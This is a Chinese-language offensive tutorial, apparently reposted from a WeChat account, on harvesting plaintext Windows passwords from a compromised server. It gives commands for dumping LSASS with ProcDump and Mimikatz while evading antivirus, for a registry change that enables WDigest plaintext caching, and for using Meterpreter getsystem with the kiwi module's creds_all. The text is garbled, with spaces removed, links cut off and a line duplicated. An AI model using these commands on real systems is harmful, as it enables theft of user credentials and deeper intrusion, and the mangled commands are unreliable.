windows 密码

获取Windows明⽂密码的⼩技巧

来⾃公众号：Bypass

在实战中，拿到⼀台Windows服务器权限，如果可以直接获取Windows明⽂密码的话，就可以更容易深⼊挖掘。本⽂分

享⼏个获取Windows明⽂密码的技巧，简单直接且有效。

01、Procdump+Mimikatz

利⽤procdump+Mimikatz绕过杀软获取Windows明⽂密码。

（1）⼯具准备：

ProcDump：

•

/zh-cn/sysinternals/downloads/procdump

mimikatz：

•

/gentilkiwi/mimikatz/

（2）WindowsServer2008R2提取明⽂密码

在⽬标机器上⽣成存储⽂件：

•

将复制到本地，使⽤mimikatz⼀⾏命令将结果输出到⽂本。

•

"sekurlsa::""sekurlsa::logonpasswords""exit">

如图：成功从内存中提取明⽂密码。

02、Window2012R2抓取密码

在Windows2012系统及以上的系统，默认在内存缓存中禁⽌保存明⽂密码的。攻击者可以通过修改注册表的⽅式抓取

明⽂，需要⽤户重新登录后才能成功抓取。

（1）修改注册表

•

regaddHKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest/vUseLogonCredential/t

REG_DWORD/d1/f

（2）⽤户administrator注销后重新登录，成功抓取到明⽂信息。

•

"privilege::debug""sekurlsa::logonpasswords">

03、MSFkiwi模块

使⽤kiwi模块需要system权限，所以我们在使⽤该模块之前需要将当前MSF中的shell提升为system。

提到system有两个⽅法，⼀是当前的权限是administrator⽤户，⼆是利⽤其它⼿段先提权到administrator⽤户。然后

administrator⽤户可以直接getsystem到system权限。

•

•

•

•

•

•

meterpreter>getuidServerusername:BYPASS-E97BA3FCAdministratormeterpreter>getsystem...gotsystemvia

technique1(NamedPipeImpersonation(InMemory/Admin)).meterpreter>getuidServerusername:NT

technique1(NamedPipeImpersonation(InMemory/Admin)).meterpreter>getuidServerusername:NT

AUTHORITYSYSTEM

加载kiwi模块：

•

loadkiwi

列举系统中的明⽂密码：

•

creds_all

---EOF---

推荐↓↓↓